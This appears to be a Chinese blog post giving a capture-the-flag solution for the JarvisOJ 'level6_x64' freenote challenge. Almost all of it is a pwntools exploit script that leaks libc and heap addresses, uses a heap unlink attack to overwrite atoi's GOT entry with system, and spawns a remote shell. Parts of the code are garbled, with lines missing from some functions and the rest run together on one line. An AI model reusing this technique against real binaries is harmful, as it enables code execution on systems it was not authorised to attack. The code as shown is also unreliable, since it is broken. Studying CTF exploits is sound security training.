1. 程式人生 > 其它 >[XMAN]level6_x64


nc pwn2.jarvisoj.com 9886

Hint1: 本題附件已更新,請大家重新下載以免影響解題。




from pwn import *

def list_note():
    io.recvuntil('Your choice: ')

def new_note(note):
    io.recvuntil('Your choice: ')
'Length of new note: ') io.sendline(str(len(note))) io.recvuntil('Enter your note: ') io.send(note) def edit_note(number, note): io.recvuntil('Your choice: ') io.sendline('3') io.recvuntil('Note number: ') io.sendline(str(number)) io.recvuntil('Length of note: ') io.sendline(str(len(note))) io.recvuntil(
'Enter your note: ') io.send(note) def delete_note(number): io.recvuntil('Your choice: ') io.sendline('4') io.recvuntil('Note number: ') io.sendline(str(number)) #io = process('./freenote_x64') #io = gdb.debug('./freenote_x64', 'b *0x400998') io = remote('pwn2.jarvisoj.com', 9886) elf
= ELF('./freenote_x64') #libc = elf.libc libc = ELF('./libc-2.19.so') atoi_got = 0x602070 #main_arena = 0x3C4B20 main_arena = 0x3C2760 new_note(b'a' * 128) new_note(b'b' * 128) new_note(b'c' * 128) new_note(b'd' * 128) new_note(b'e' * 128) delete_note(1) delete_note(3) edit_note(0, b'a' * 128 + b'b' * 0x10) list_note() io.recvuntil('b' * 0x10) libc_addr = u64(io.recvline().strip().ljust(8, b'\x00')) info("libc_addr:" + str(hex(libc_addr))) libc_base = libc_addr - main_arena - 88 info("libc_base:" + str(hex(libc_base))) system_addr = libc_base + libc.symbols['system'] info("system_addr" + str(hex(system_addr))) edit_note(0, b'a' * 128 + b'b' * 0x18) list_note() io.recvuntil('b' * 0x18) heap_addr = u64(io.recvline().strip().ljust(8, b'\x00')) info("heap_addr:" + str(hex(heap_addr))) heap_base = heap_addr - 0x19d0 info("heap_base:" + str(hex(heap_base))) unlink_addr = heap_base + 0x30 info("unlink_addr:" + str(hex(unlink_addr))) payload = p64(0x90) + p64(0x80) + p64(unlink_addr - 0x18) + p64(unlink_addr - 0x10) payload = payload.ljust(0x80, b'\x00') payload += p64(0x80) + p64(0x90) payload = payload.ljust(0x80 * 2, b'\x00') edit_note(0, payload) delete_note(1) payload = p64(2) + p64(1) + p64(0x100) + p64(heap_base + 0x18) + p64(1) + p64(8) + p64(atoi_got) payload = payload.ljust(0x80 * 2, b'\x00') edit_note(0, payload) edit_note(1, p64(system_addr)) io.recvuntil('Your choice: ') io.sendline('/bin/sh') io.interactive()